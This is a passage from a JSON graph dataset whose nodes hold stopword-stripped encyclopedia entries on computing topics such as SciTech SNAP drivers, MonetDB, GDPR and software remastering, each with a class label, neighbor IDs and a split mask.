    "text": "SciTech_SNAP:scitech snap scitech snap system neutral access protocol operating system portable dynamically loadable native-size 32-bit/64-bit device driver architecture scitech snap defines architecture loading operating system neutral binary device driver type hardware device graphics controller audio controller scsi controller network controller scitech snap drivers source code portable different microprocessor platforms binary drivers operating system portable within particular microprocessor family snap drivers originally developed intel 386+ cpu 32-bit operating system environment supported cpu introduction snap 3.0 native binary snap drivers available 32-bit powerpc cpus 64-bit x86-64 cpus 2002-08-27 scitech software inc. announced intention release scitech snap driver development kit 2006-11-16 scitech software inc. announced ceased development snap device driver technology favor new line web business logic technologies scitech also announced would begin looking buyer scitech snap december 2008 alt richmond inc. closed acquisition scitech software ’ snap technology plans scitech software 2008 create opensnap open source version driver technology therefore longer option unless alt richmond decides pick may 2015 arca noae llc announced reached agreement alt richmond inc. license source code snap graphics os/2 scitech display doctor 6.5 included replacement video driver windows 95 higher works hardware supported sdd sdd 7 driver renamed scitech nucleus graphics driver nucleus graphics driver later incorporated scitech snap graphics snap 3 nucleus renamed snap scitech snap graphics version 2 also included vbetest/lite vesa bios extensions vbe compliance test version 8.00 later removed scitech snap graphics 3 scitech snap 3 dos opengl tests scitech display doctor 7 beta found gactrl driver control center windows version scitech snap graphics maintained user interface found sdd 7 beta first product scitech snap line provides accelerated graphics scitech snap graphics ported dos os/2 microsoft windows ce nt 2000 xp qnx smx sunos/solaris port minix linux time rtos-32 unununium os operating systems supported hardware included video processors 3dfx 3dlabs alliance semiconductor amd geode gx2 ark logic ati chips technologies cirrus logic cyrix ibm integraphics intel matrox neomagic number nine nvidia oak philips rendition s3 sigma designs silicon motion sis tseng labs trident via weitek well video card supporting vbe 1.2 higher although scitech snap graphics offer standalone vbe driver snap driver accelerates applications using vbe calls via scitech snap graphics driver snap graphics windows also accelerate vbe 3 calls dos programs run windows dos box scitech also offer scitech snap graphics pe personal edition scitech site allows registered users download snap driver hardware operating system specified users user account download two drivers per week driver generated service run six months scitech snap graphics pe tools gactrl gamode gaoption gaperf dos tools included gldirect tests included windows driver similar scitech snap graphics provides os-independent audio drivers ported windows nt 4.0 supported hardware include ac'97 intel hda hda support modem function designed provide easy access attached display order program directly via i²c simply read monitor edid record",
    "neighbors": [
      11634,
      8700,
      6797,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 9893,
    "label": 1,
    "text": "MonetDB:monetdb monetdb open-source column-oriented database management system developed centrum wiskunde informatica cwi netherlands designed provide high performance complex queries large databases combining tables hundreds columns millions rows monetdb applied high-performance applications online analytical processing data mining geographic information system gis resource description framework rdf text retrieval sequence alignment processing data mining projects 1990s required improved analytical database support resulted cwi spin-off called data distilleries used early monetdb implementations analytical suite data distilleries eventually became subsidiary spss 2003 turn acquired ibm 2009 monetdb current form first created 2002 doctoral student peter boncz professor martin l. kersten part 1990s magnum research project university amsterdam initially called simply monet french impressionist painter claude monet first version open-source software license modified version mozilla public license released september 30 2004 monetdb version 4 released open-source domain many extensions code base added monetdb/cwi team included new sql frontend supporting standard monetdb introduced innovations layers dbms storage model based vertical fragmentation modern cpu-tuned query execution architecture often gave monetdb speed advantage algorithm typical interpreter-based rdbms one first database systems tune query optimization cpu caches monetdb includes automatic self-tuning indexes run-time query optimization modular software architecture 2008 follow-on project called x100 monetdb/x100 started evolved vectorwise technology vectorwise acquired actian corporation integrated ingres database sold commercial product 2011 major effort renovate monetdb codebase started part code monetdb 4 kernel xquery components frozen monetdb 5 parts sql layer pushed kernel resulting changes created difference internal apis transitioned monetdb instruction language mil monetdb assembly language mal older no-longer maintained top-level query interfaces also removed first xquery relied monetdb 4 never ported version 5 experimental jaql interface support removed october 2014 release july 2015 release monetdb gained support read-only data sharding persistent indices release deprecated streaming data module datacell also removed main codebase effort streamline code addition license changed mozilla public license version 2.0 monetdb architecture represented three layers set optimizers front-end top layer providing query interface sql sciql sparql interfaces development queries parsed domain-specific representations like relational algebra sql optimized generated logical execution plans translated monetdb assembly language mal instructions passed next layer middle back-end layer provides number cost-based optimizers mal bottom layer database kernel provides access data stored binary association tables bats bat table consisting object-identifier value columns representing single column database monetdb internal data representation also relies memory addressing ranges contemporary cpus using demand paging memory mapped files thus departing traditional dbms designs involving complex management large data stores limited memory query recycling architecture reusing byproducts operator-at-a-time paradigm column store dbms recycling makes use generic idea storing reusing results expensive computations unlike low-level instruction caches query recycling uses optimizer pre-select instructions cache technique designed improve query response times throughput working self-organizing fashion authors cwi database architectures group composed milena ivanova martin kersten niels nes romulo goncalves best paper runner acm sigmod 2009 conference work query recycling monetdb one first databases introduce database cracking database cracking incremental partial indexing and/or sorting data directly exploits columnar nature monetdb cracking technique shifts cost index maintenance updates query processing query pipeline optimizers used massage query plans crack propagate information technique allows improved access times self-organized behavior database cracking received acm sigmod 2011 j.gray best dissertation award number extensions exist monetdb extend functionality database engine due three-layer architecture top-level query interfaces benefit optimizations done backend kernel layers monetdb/sql top-level extension provides complete support transactions compliance standard monetdb/gis extension monetdb/sql support simple features access standard open geospatial consortium ogc sciql sql-based query language science applications arrays first class citizens sciql allows monetdb effectively function array database sciql used european union planetdata teleios project together data vault technology providing transparent access large scientific data repositories data vaults map data distributed repositories sciql arrays allowing improved handling spatio-temporal data monetdb sciql extended human brain project data vault database-attached external file repository monetdb similar sql/med standard data vault technology allows transparent integration distributed/remote file repositories designed scientific data data exploration mining specifically remote sensing data support geotiff earth observation fits astronomy miniseed seismology netcdf formats data stored file repository original format loaded database lazy fashion needed system also process data upon ingestion data format requires result even large file repositories efficiently analyzed required data processed database data accessed either monetdb sql sciql interfaces data vault technology used european union teleios project aimed building virtual observatory earth observation data data vaults fits files also used processing astronomical survey data int photometric h-alpha survey iphas monetdb sam/bam module efficient processing sequence alignment data aimed bioinformatics research module sam/bam data loader set sql udfs working dna data module uses popular samtools library monetdb/rdf sparql-based extension working linked data adds support rdf allowing monetdb function triplestore development linked open data 2 project monetdb/r module allows udfs written r executed sql layer system done using native r support running embedded another application inside rdbms case previously monetdb.r connector allowed using monetdb data sources process r session newer r integration feature monetdb require data transferred rdbms r session reducing overhead improving performance feature intended give users access functions r statistical software in-line analysis data stored rdbms complements existing support c udfs intended used in-database processing similarly embedded r udfs monetdb database support udfs written python/numpy implementation uses numpy arrays python wrappers c arrays result limited overhead providing functional python integration speed matching native sql functions embedded python functions also support mapped operations allowing user execute python functions parallel within sql queries practical side feature gives users access python/numpy/scipy libraries provide large selection statistical/analytical functions following release remote driver r monetdb.r r udfs monetdb monetdb/r authors created embedded version monetdb r called monetdblite distributed r package removing need manage database server required previous r integrations dbms runs within r process eliminating socket communication serialisation overhead greatly improving efficiency idea behind deliver sqlite-like package r performance in-memory optimized columnar store number former extensions deprecated removed stable code base time notable examples include xquery extension removed monetdb version 5 jaql extension streaming data extension called data cell",
    "neighbors": [
      5632,
      3,
      7684,
      6536,
      10389,
      5151,
      5794,
      5546,
      4781,
      10286,
      7983,
      10413,
      7868,
      6780,
      5833,
      5450,
      462,
      6479,
      2901,
      86,
      7767,
      4058,
      3045,
      6629,
      1383,
      8554,
      5612,
      10734,
      10737,
      9714,
      6131,
      1142,
      6775,
      3323,
      3196,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9894,
    "label": 4,
    "text": "Opal_Storage_Specification:opal storage specification opal storage specification set specifications features data storage devices disk drives enhance security example defines way encrypting stored data unauthorized person gains possession device see data specification self-encrypting drives sed specification published trusted computing group storage workgroup opal ssc security subsystem class implementation profile storage devices built opal ssc encompasses functions radboud university researchers indicated november 2018 hardware encryption including opal implementations security vulnerabilities",
    "neighbors": [
      704,
      9569,
      8900,
      5384,
      2416,
      9137,
      7794,
      9055,
      1400,
      8668,
      4221,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 9895,
    "label": 9,
    "text": "Richard_Bird_(computer_scientist):richard bird computer scientist richard simpson bird born 1943 london supernumerary fellow computation lincoln college oxford england former director oxford university computing laboratory oxford university department computer science bird research interests lie algorithm design functional programming known regular contributor journal functional programming author introduction functional programming using haskell books name associated bird-meertens formalism calculus deriving programs specifications functional programming style previously bird university reading",
    "neighbors": [
      4392,
      219,
      3876,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 9896,
    "label": 1,
    "text": "AutoFetch:autofetch autofetch mechanism automatically tuning object-relational mapping queries ali ibrahim william cook university texas developed idea autofetch including implementation hibernate followed later implementation ebean autofetch uses program state typically call stack classify queries means autofetch tune query depending called example data access api codice_1 tuned differently depending callers method autofetch automatically gathers profiling information developers need manually try gather information apply performance optimizations code autofetch monitor object graph usage usage changes tuning query change suit reduces code maintenance issues developers maintains optimal performance usage changes time autofetch collects object graph usage queries executed collects 'profile information later used automatically tune query subsequent executions orm query tuned determining automatically adding correct prefetch directives query improves performance application reducing lazy loading orms support partial objects autofetch also tune query including properties application uses rather properties autofetch profiling also used select optimal query strategies array fetching object graph use known uneven typically weighted first object graphs list could lead much efficient higher performing object graph traversal currently possible current techniques employed orm tools",
    "neighbors": [
      5040,
      5987,
      6860,
      9467
    ],
    "mask": "None"
  },
  {
    "node_id": 9897,
    "label": 2,
    "text": "Secure_operating_system:secure operating system secure operating system may refer",
    "neighbors": [
      125,
      9646
    ],
    "mask": "Test"
  },
  {
    "node_id": 9898,
    "label": 0,
    "text": "VoxForge:voxforge voxforge free speech corpus acoustic model repository open source speech recognition engines voxforge set collect transcribed speech create free gpl speech corpus use open source speech recognition engines speech audio files 'compiled acoustic models use open source speech recognition engines julius isip sphinx htk note htk distribution restrictions voxforge used librivox source audio data since 2007",
    "neighbors": [
      6362,
      10557,
      9798
    ],
    "mask": "None"
  },
  {
    "node_id": 9899,
    "label": 2,
    "text": "Musix_GNU+Linux:musix gnu+linux musix gnu+linux live cd dvd linux distribution ia-32 processor family based debian contains collection software audio production graphic design video editing general purpose applications initiator co-director project marcos germán guglielmetti musix gnu+linux one gnu/linux distributions recognized free software foundation primarily available sites distributing free software excluding non-free information practical use musix developed team argentina spain mexico brazil main language used development discussion documentation spanish however musix community users speak spanish portuguese english musix 0.x 1.0 rx versions released 2005 2008 musix 1.0 r6 last stable release dvd musix 1.0 r2r5 last stable release cd live-cd system 1350 software packages runs directly cd/dvd without need install anything pc installed pc relatively easily desired minutes like knoppix kanotix live-dvd 1.0 r3 test5 2279 software packages programs include rosegarden ardour musicians inkscape vectorial design gimp manipulation images cinelerra video editing blender 3d animation desktop light 18 mb ram x.org based icewm/rox-filer unique feature multiple pinboards ordered general purpose apps help office root/admin midi internet graphics audio pinboards arrays desktop backgrounds icons small version kde desktop installed default live-cd version live-dvd full kde version supporting several languages musix 2.0 developed using live-helper scripts debian-live project first alpha version musix 2.0 released 2009-03-25 including two realtime-patched linux-libre kernels 2009-05-17 first beta version musix 2.0 released final musix gnu+linux 2.0 version cd dvd usb launched november 2009 daniel vidal suso comesaña carlos sanchiavedraz joseangon musix developers version presented palau firal de congressos de tarragona españa suso comesaña quite similar linux-version developed brazilian music teacher gilberto andré borges named adriane musixbr version fork derived knoppix 6.1 adriane",
    "neighbors": [
      5380,
      8837,
      7435,
      4493,
      10127,
      2321,
      10257,
      5397,
      9366,
      4887,
      10394,
      10016,
      673,
      3618,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2864,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      8033,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 9900,
    "label": 4,
    "text": "National_Security_Operations_Center:national security operations center national security operations center nsoc directorate k part united states national security agency responsible current operations time-sensitive signals intelligence sigint reporting united states sigint system usss one two centers watching directorate v ntoc assesses threats nsoc operations center 24 hours day 7 days week basis providing total situational awareness across nsa/css enterprise foreign signals intelligence information assurance maintains cognizance national security information needs monitors unfolding world events 1969 u.s. navy ec-121 patrol plane shot sea japan ensuing hours nsa leaders raced office office gather information necessary assemble coordinated response agency national leadership incident demonstrated need dedicated watch center respond breaking world events center established 1968 national sigint watch center nswc renamed national sigint operations center nsoc 1973 nerve center nsa got current name 1996 september 11 2001 attacks nsoc mission broadened watch center operations center today",
    "neighbors": [
      1986,
      6344,
      7887,
      7119,
      7893,
      8726,
      3356
    ],
    "mask": "None"
  },
  {
    "node_id": 9901,
    "label": 4,
    "text": "General_Data_Protection_Regulation:general data protection regulation general data protection regulation eu 2016/679 gdpr regulation eu law data protection privacy individual citizens european union eu european economic area eea also addresses transfer personal data outside eu eea areas gdpr aims primarily give control individuals personal data simplify regulatory environment international business unifying regulation within eu superseding data protection directive 95/46/ec regulation contains provisions requirements pertaining processing personal data individuals formally called data subjects gdpr inside eea applies enterprise established eea or—regardless location data subjects citizenship—that processing personal information data subjects inside eea controllers personal data must put place appropriate technical organisational measures implement data protection principles business processes handle personal data must designed built consideration principles provide safeguards protect data example using pseudonymization full anonymization appropriate use highest-possible privacy settings default datasets publicly available without explicit informed consent used identify subject without additional information must stored separately personal data may processed unless processing done lawful basis specified regulation unless data controller processor received unambiguous individualized affirmation consent data subject data subject right revoke consent time processor personal data must clearly disclose data collection declare lawful basis purpose data processing state long data retained shared third parties outside eea data subjects right request portable copy data collected processor common format right data erased certain circumstances public authorities businesses whose core activities centre around regular systematic processing personal data required employ data protection officer dpo responsible managing compliance gdpr businesses must report data breaches within 72 hours adverse effect user privacy cases violators gdpr may fined €20 million 4 annual worldwide turnover preceding financial year case enterprise whichever greater gdpr adopted 14 april 2016 became enforceable beginning 25 may 2018 gdpr regulation directive directly binding applicable provide flexibility certain aspects regulation adjusted individual member states gdpr 2016 eleven chapters concerning general provisions principles rights data subject duties data controllers processors transfers personal data third countries supervisory authorities cooperation among member states remedies liability penalties breach rights miscellaneous final provisions regulation applies data controller organisation collects data eu residents processor organisation processes data behalf data controller like cloud service providers data subject person based eu certain circumstances regulation also applies organisations based outside eu collect process personal data individuals located inside eu regulation apply processing data person purely personal household activity thus connection professional commercial activity recital 18 according european commission personal data information relates identified identifiable individual directly identify individual information need consider whether individual still identifiable take account information processing together means reasonably likely used either person identify individual.the precise definitions terms personal data processing data subject controller processor stated article 4 regulation regulation purport apply processing personal data national security activities law enforcement eu however industry groups concerned facing potential conflict laws questioned whether article 48 gdpr could invoked seek prevent data controller subject third country laws complying legal order country law enforcement judicial national security authorities disclose authorities personal data eu person regardless whether data resides eu article 48 states judgement court tribunal decision administrative authority third country requiring controller processor transfer disclose personal data may recognised enforceable manner unless based international agreement like mutual legal assistance treaty force requesting third non-eu country eu member state data protection reform package also includes separate data protection directive police criminal justice sector provides rules personal data exchanges national european international levels single set rules apply eu member states member state establish independent supervisory authority sa hear investigate complaints sanction administrative offences etc sas member state co-operate sas providing mutual assistance organising joint operations business multiple establishments eu single sa lead authority based location main establishment main processing activities take place lead authority act one-stop shop supervise processing activities business throughout eu articles 46–55 gdpr european data protection board edpb co-ordinate sas edpb replace article 29 data protection working party exceptions data processed employment context national security still might subject individual country regulations articles 2 2 88 gdpr unless data subject provided informed consent data processing one purposes personal data may processed unless least one legal basis article 6 states lawful purposes informed consent used lawful basis processing consent must explicit data collected purpose data used article 7 defined article 4 consent must specific freely-given plainly-worded unambiguous affirmation given data subject online form consent options structured opt-out selected default violation gdpr consent unambiguously affirmed user addition multiple types processing may bundled together single affirmation prompt specific use data individual permissions freely-given recital 32 data subjects must allowed withdraw consent time process must harder opt article 7 3 data controller may refuse service users decline consent processing strictly necessary order use service article 7 4 consent children defined regulation less 16 years old although option member states individually make low 13 years old article 8 1 must given child parent custodian verifiable article 8 consent processing already provided data protection directive data controller re-obtain consent processing documented obtained compliance gdpr requirements recital 171 article 12 requires data controller provides information 'data subject concise transparent intelligible easily accessible form using clear plain language particular information addressed specifically child right access article 15 data subject right gives citizens right access personal data information personal data processed data controller must provide upon request overview categories data processed article 15 1 b well copy actual data article 15 3 furthermore data controller inform data subject details processing purposes processing article 15 1 data shared article 15 1 c acquired data article 15 1 g data subject must able transfer personal data one electronic processing system another without prevented data controller data sufficiently anonymised excluded data de-identified remains possible link individual question providing relevant identifier practice however providing identifiers challenging case apple siri voice transcript data stored personal identifier manufacturer restricts access online behavioural targeting relies heavily device fingerprints challenging capture send verify data 'provided data subject data 'observed behaviour included addition data must provided controller structured commonly used standard electronic format right data portability provided article 20 gdpr right forgotten replaced limited right erasure version gdpr adopted european parliament march 2014 article 17 provides data subject right request erasure personal data related one number grounds within 30 days including noncompliance article 6 1 lawfulness includes case f legitimate interests controller overridden interests fundamental rights freedoms data subject require protection personal data see also google spain sl google inc. v agencia española de protección de datos mario costeja gonzález able demonstrate compliance gdpr data controller must implement measures meet principles data protection design default article 25 requires data protection measures designed development business processes products services measures include pseudonymising personal data controller soon possible recital 78 responsibility liability data controller implement effective measures able demonstrate compliance processing activities even processing carried data processor behalf controller recital 74 data collected data subjects must clearly informed extent data collection legal basis processing personal data long data retained data transferred third-party and/or outside eu automated decision-making made solely algorithmic basis data subjects must informed privacy rights gdpr including right revoke consent data processing time right view personal data access overview processed right obtain portable copy stored data right erasure data certain circumstances right contest automated decision-making made solely algorithmic basis right file complaints data protection authority data subject must also provided contact details data controller designated data protection officer applicable data protection impact assessments article 35 conducted specific risks occur rights freedoms data subjects risk assessment mitigation required prior approval data protection authorities required high risks article 25 requires data protection designed development business processes products services privacy settings must therefore set high level default technical procedural measures taken controller make sure processing throughout whole processing lifecycle complies regulation controllers also implement mechanisms ensure personal data processed unless necessary specific purpose report european union agency network information security elaborates needs done achieve privacy data protection default specifies encryption decryption operations must carried locally remote service keys data must remain power data owner privacy achieved report specifies outsourced data storage remote clouds practical relatively safe data owner cloud service holds decryption keys gdpr refers pseudonymisation process required data stored alternative option complete data anonymisation transform personal data way resulting data attributed specific data subject without use additional information example encryption renders original data unintelligible process reversed without access correct decryption key gdpr requires additional information decryption key kept separately pseudonymised data another example pseudonymisation tokenisation non-mathematical approach protecting data rest replaces sensitive data non-sensitive substitutes referred tokens tokens extrinsic exploitable meaning value allow specific data fully partially visible processing analytics sensitive information kept hidden tokenisation alter type length data means processed legacy systems databases may sensitive data length type also requires much fewer computational resources process less storage space databases traditionally-encrypted data pseudonymisation privacy-enhancing technology recommended reduce risks concerned data subjects also help controllers processors meet data protection obligations recital 28 records processing activities must maintained include purposes processing categories involved envisaged time limits records must made available supervisory authority request article 30 article 33 states data controller legal obligation notify supervisory authority without undue delay unless breach unlikely result risk rights freedoms individuals maximum 72 hours becoming aware data breach make report individuals notified high risk adverse impact determined article 34 addition data processor notify controller without undue delay becoming aware personal data breach article 33 however notice data subjects required data controller implemented appropriate technical organisational protection measures render personal data unintelligible person authorised access encryption article 34 article 37 requires appointment data protection officer processing carried public authority except courts independent judicial authorities acting judicial capacity processing operations involve regular systematic monitoring data subjects large scale processing large scale special categories data personal data relating criminal convictions offences articles 9 article 10 data protection officer dpo —a person expert knowledge data protection law practices—must designated assist controller processor monitoring internal compliance regulation designated dpo current member staff controller processor role outsourced external person agency service contract case processing body must make sure conflict interest roles interests dpo may hold contact details dpo must published processing organisation example privacy notice registered supervisory authority dpo similar compliance officer also expected proficient managing processes data security including dealing cyberattacks critical business continuity issues around holding processing personal sensitive data skill set required stretches beyond understanding legal compliance data protection laws regulations dpo must maintain living data inventory data collected stored behalf organization details function role data protection officer given 13 december 2016 revised 5 april 2017 guideline document organisations based outside eu must also appoint eu-based person representative point contact gdpr obligations article 27 distinct role dpo although overlap responsibilities suggest role also held designated dpo eu representative eu-based designee “ ambassador ” non-eu establishment data controller data processor subject general data protection regulation gdpr eu natural individual moral corporation person play role eu representative eu representative controller ’ processor ’ contact person vis-à-vis european privacy supervisors data subjects matters relating processing ensure compliance gdpr purpose representation enable european data protection supervisory authorities ensure compliance gdpr able control supervise activities non-eu establishments subject gdpr respective representatives eu non-eu establishments subject gdpr obliged designate eu representative worth reiterating fact non-eu establishment shall subject gdpr regularly undertakes one following activities offering goods services irrespective whether payment data subject required data subjects eu and/or b monitoring behaviour data subjects eu far behaviour takes place within eu provision concerns company offers goods services online eu customers uses cookies similar technologies track eu data subjects establishments must comply gdpr thus obliged designate eu representative however non-eu establishment exempted designating eu representative processing occasional include large scale processing special categories data referred article 9 1 gdpr processing personal data relating criminal convictions offences referred article 10 gdpr processing unlikely result risk rights freedoms natural persons taking account nature context scope purposes processing non-eu public authorities bodies equally exempted foreign company subject gdpr refuses designate eu representative required former infringing gdpr runs risk imposed administrative fine ten million euros 10 000 000 eur 2 percent company ’ total worldwide annual turnover preceding financial year whichever higher ignorance gdpr would excuse intentional negligent willful blindness character infringement failure designate eu representative may rather constitute aggravating factors reasons foreign companies haste designate respective eu representatives eu-based data protection specialized companies rendered things easier european data protection specialized companies offer cheap efficient representation services especially data privacy day-to-day activity like heads state designate ambassadors letters credence non-eu establishment must issue duly signed document letter accreditation designating given individual company eu representative said designation given writing gdpr art 27 1 eu-based data protection companies already draft letters accreditation would simply forward interested companies sign send post besides definitions criminal offence according national law following article 83 gdpr following sanctions imposed within gdpr distinct difference business consumer b2c business business b2b marketing gdpr six equally valid grounds process personal data two relevant direct b2b marketing consent legitimate interest recital 47 gdpr states processing personal data direct marketing purposes may regarded carried legitimate interest using legitimate interest basis b2b marketing involves ensuring key conditions met additionally article 6.1 f gdpr states processing lawful necessary purposes legitimate interests pursued controller third-party except interests overridden interests fundamental rights freedoms individual require protection personal information particular individual child therefore companies continue use marketing data purposes b2b engagement long appropriate steps taken ensure data aligned specific objective campaign one phrase used correct marketing correct person part companies need keep marketing databases crm date order carry valid legitimate balance checks eu commission stated unified data privacy laws create extraordinary opportunities motivating innovation businesses within europe also organization willing business european states already running business european states commission aims companies maintain communications build regulation supporting relationships ensure best data practices legitimate balance checks following cases covered regulation conversely entity precisely enterprise engaged economic activity covered gdpr economic activity defined broadly european union competition law proposal new regulation gave rise much discussion controversy. ref name= taylor wessing 9/2016 dpo burden /ref thousands amendments proposed area gdpr consent number implications businesses record calls matter practice typical disclaimer considered sufficient gain assumed consent record calls additionally recording commenced caller withdraw consent agent receiving call must able stop previously started recording ensure recording get stored professionals expect compliance gdpr require additional investment overall 80 percent surveyed expected gdpr-related spending least usd 100,000. ref name= babel 7/11/2017 high cost gdpr /ref concerns echoed report commissioned law firm baker mckenzie found around 70 percent respondents believe organizations need invest additional budget/effort comply consent data mapping cross-border data transfer requirements gdpr total cost eu companies estimated around €200 billion us companies estimate 41.7 billion argued smaller businesses startup companies might financial resources adequately comply gdpr unlike larger international technology firms facebook google regulation ostensibly meant target first foremost lack knowledge understanding regulations also concern lead-up adoption counter-argument companies made aware changes two years prior coming effect therefore enough time prepare regulations including whether enterprise must data protection officer criticized potential administrative burden unclear compliance requirements although data minimisation requirement pseudonymisation one possible means regulation provide guidance constitutes effective data de-identification scheme grey area would considered inadequate pseudonymisation subject section 5 enforcement actions also concern regarding implementation gdpr blockchain systems transparent fixed record blockchain transactions contradicts nature gdpr many media outlets commented introduction right explanation algorithmic decisions legal scholars since argued existence right highly unclear without judicial tests limited best gdpr garnered support businesses regard opportunity improve data management mark zuckerberg also called positive step internet called gdpr-style laws adopted us consumer rights groups european consumer organisation among vocal proponents legislation supporters attributed passage whistleblower edward snowden free software advocate richard stallman praised aspects gdpr called additional safeguards prevent technology companies manufacturing consent academic experts participated formulation gdpr wrote law consequential regulatory development information policy generation gdpr brings personal data complex protective regulatory regime said ideas contained within gdpr entirely european new gdpr ’ protections found – albeit weaker less prescriptive forms – u.s. privacy laws federal trade commission settlements companies despite least two years prepare many companies websites changed privacy policies features worldwide directly prior gdpr implementation customarily provided email notifications discussing changes criticised resulting fatiguing number communications experts noted reminder emails incorrectly asserted new consent data processing obtained gdpr took effect previously-obtained consent processing valid long met regulation requirements phishing scams also emerged using falsified versions gdpr-related emails also argued gdpr notice emails may actually sent violation anti-spam laws march 2019 provider compliance software found many websites operated eu member state governments contained embedded tracking ad technology providers deluge gdpr-related notices also inspired memes including surrounding privacy policy notices delivered atypical means ouija board star wars opening crawl suggesting santa claus naughty nice list violation recording excerpts regulation former bbc radio 4 shipping forecast announcer blog gdpr hall shame also created showcase unusual delivery gdpr notices attempts compliance contained egregious violations regulation requirements author remarked regulation lot nitty gritty in-the-weeds details lot information comply also acknowledged businesses two years comply making responses unjustified research indicates approximately 25 software vulnerabilities gdpr implications since article 33 emphasizes breaches bugs security experts advise companies invest processes capabilities identify vulnerabilities exploited including coordinated vulnerability disclosure processes effective date international websites began block eu users entirely including instapaper unroll.me tribune publishing-owned newspapers chicago tribune los angeles times redirect stripped-down versions services case national public radio usa today limited functionality and/or advertising order remove liabilities companies klout several online video games ceased operations entirely coincide implementation citing gdpr burden continued operations especially due business model former sales volume online behavioural advertising placements europe fell 25–40 25 may 2018 facebook subsidiaries whatsapp instagram well google llc targeting android immediately sued max schrems non-profit noyb hours midnight 25 may 2018 use forced consent schrems asserts companies violated article 7 4 presenting opt-ins data processing consent individualized basis requiring users consent data processing activities including strictly necessary forbidden using services following journalistic investigation liviu dragnea romanian data protection authority anspdcp used gdpr request demand information rise project sources april 3 2019 google fined record £44m failing comply gdpr cnil france data protection office found google guilty breaking eu privacy rules failing acquire adequate consent users regarding data used personalised advertising regulator also found google n't provide clear easily accessible information consumers regarding data collection retention mass adoption new privacy standards international companies cited example brussels effect phenomenon wherein european laws regulations used global baseline due gravitas u.s. state california passed california consumer privacy act 28 june 2018 taking effect 1 january 2020 grants rights transparency control collection personal information companies similar means gdpr critics argued laws need implemented federal level effective collection state-level laws would varying standards would complicate compliance 9 april 2019 u.s. senators deb fischer mark warner introduced deceptive experiences online users reduction detour act would make unlawful u.s. technology companies 100 million monthly active users use deceptive ambiguous user interface patterns seeking consent collect personal information eu digital single market strategy relates digital economy activities related businesses people eu part strategy gdpr nis directive apply 25 may 2018 proposed eprivacy regulation also planned applicable 25 may 2018 delayed several months eidas regulation also part strategy united kingdom scheduled leave european union 2019 uk granted royal assent data protection act 2018 23 may 2018 contains equivalent regulations protections uk leaves eu become third country purposes transfer personal data outside eu may require adequacy decision european commission suitability uk data protection framework appropriate safeguards may allow transfers take place chapter v currently august 2018 uk government view 'legally-binding data protection agreement eu uk would appropriate 'adequacy finding agreement would include uk information commissioner taking part 'one stop shop mechanism seat european data protection board april 2019 uk information commissioner office ico issued proposed code practice social networking services used minors enforceable gdpr also includes restrictions like streak mechanisms order discourage social media addiction use data processing interests american bar association published 2018 gdpr applies extraterritorially eu commission basis article 45 gdpr determined following countries offer adequate level data protection address new regulation retention disposition applications developed updated since data protection addresses much traditional records management several software solutions emerged include vast array issues facing information professionals",
    "neighbors": [
      2818,
      4995,
      1930,
      5002,
      8204,
      5133,
      3599,
      1169,
      3858,
      10002,
      5524,
      5404,
      11164,
      7328,
      9248,
      3111,
      3495,
      3880,
      9260,
      3629,
      8623,
      6455,
      11319,
      11581,
      10050,
      4678,
      7623,
      970,
      1104,
      5200,
      5461,
      1368,
      2779,
      4194,
      1251,
      7781,
      362,
      4330,
      3692,
      5994,
      2932,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9902,
    "label": 2,
    "text": "Software_remastering:software remastering software remastering software development recreates system software applications incorporating customizations intent copied run elsewhere off-label usage remastered codebase continue parallel ongoing upstream software development fork remastered version term comes remastering media production similarly distinguished mere copying remastering popularized klaus knopper creator knoppix free software foundation promotes universal freedom recreate distribute computer software example funding projects like gnu project remastered linux bsd opensolaris operating system distributions common copy protected also allowance operating systems grow application taking snapshot installing onto bootable media thumb drive virtual machine hypervisor since 2001 1000 computer operating systems arisen download internet global community linux providers pushes practice remastering developer switching project overtaking merging sharing internet distributions start remastered version another distribution evidenced announcements made distrowatch notably remastering sls linux forked slackware remastering red hat linux helped fork yellow dog linux mandriva turbolinux remastering debian distribution ubuntu started remastered linux mint team might involve critical system software extent customizations made remastering trivial change default setting distribution subsequent provision acquaintance installation media remastered version becomes public becomes distribution microsoft windows also modified remastered various utilities exist combine windows updates device drivers original windows cd/dvd installation media process known slipstreaming remastering distro remastering software applied inside live operating system clone installation package remastering necessarily require remastering software facilitates process example application remastered acquiring modifying recompiling original source code many video games modded upgrading additional content levels features notably counter-strike remastered half-life went marketed commercial product software remastering creates application rebuilding code base software objects existing master repository mastering process assembles distribution release version remaster process subtraction modification addition master repository similarly modified makefile orchestrates computerized version application amount unneeded code cut wanted minimum removes unwanted features original publisher maintainer needs new features added evolves software remastered version may consider feature original bug provides modified copy feature works better way published software remaster maintains integrity named product derived adherence shared software repository modifications intention maintaining good name needing approval approval happen name repository option become master creator published software remaster work evolve software must least arrange maintenance support channels updating user documentation providing forum internet relay chat line wiki providing intent maintain version life usefulness remastering centers around reputation product distribution process requires official sanctioned version differs attitude much free software many cases name product cheap plentiful stable guarantees liabilities offered permission inherently granted redistribution modified version name original repository master creative flavors spins may already offered original producers remaster production supports additional software outside supports new mixture software original repository keeps modifications original masters outside master repository software remastering tolerated maintainers master repository free software modifications encouraged social conventions mklivecd runs linux machine make bootable portable media image linux system works linux distribution probably needs installed first remaster personalized version pclinuxos created according needs individual created using mklivecd script applied installation official flavors pclinuxos official remaster include software components official repository version control community remaster may contain software components outside reference pclinuxos derived pclinuxos based pclinuxos intended distribution several third-party distributions years though may mention connection follow strict guidelines concerning quality maintainability distribution channels subject approval officiating members forum pclinuxos gnome edition example community remaster unity linux intended base platform acts distribution template ensures interoperability packages upon one encouraged remaster new gnu/linux os distributions linux mint remastering tool called mintconstructor creating distributions based linux mint creating iso files also package manager uses .mint files linux mint based ubuntu linux distribution ubuntu based debian distribution linux mint also offers debian edition provide example meeting kind codebase challenges goes remastering branch two distributions gentoo linux uses catalyst user installs configures runs gets one big archive-formatted file /var/tmp/catalyst/builds configuration options target machine 